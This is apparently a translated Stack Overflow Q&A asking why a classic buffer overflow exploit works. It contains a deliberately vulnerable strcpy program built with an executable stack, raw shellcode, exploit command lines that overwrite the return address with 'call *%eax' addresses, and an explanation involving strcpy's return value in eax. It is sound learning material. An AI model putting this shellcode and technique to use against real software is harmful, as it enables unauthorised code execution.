如何解释C中的缓冲区溢出漏洞

时间:2013-09-28 21:18:40

标签: c debugging assembly buffer-overflow

鉴于此C程序:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
  char buf[1024];
  strcpy(buf, argv[1]);
}

内置:

gcc -m32 -z execstack prog.c -o prog

给出shell代码:

EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')

该程序可以使用以下命令进行利用:

./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')

我从哪里获得地址:

$ objdump -d prog | grep call.*eax
 8048387:   ff d0                   call   *%eax
 804840f:   ff d0                   call   *%eax

我理解中间AAAA填充的含义,我根据程序中buf的长度和$EGG的长度计算了991。

我不明白为什么这些带有call *%eax的地址会触发复制到buf开头的shellcode的执行。据我所知,我用0x8048387(或另一个)覆盖了返回地址,我不明白为什么这会导致跳转到shellcode。

我通过阅读Smashing the stack for fun and profit得到了这一点。但是本文使用了一种不同的方法来猜测相对地址以跳转到shellcode。我很困惑为什么这个更简单的替代解决方案可以直接运行,而不需要猜测。

1 个答案:

答案 0 :(得分:2)

strcpy的返回值是目标(在这种情况下为buf),并且使用寄存器eax传递。因此,如果在eax返回之前没有任何内容销毁maineax将保存指向shell代码的指针。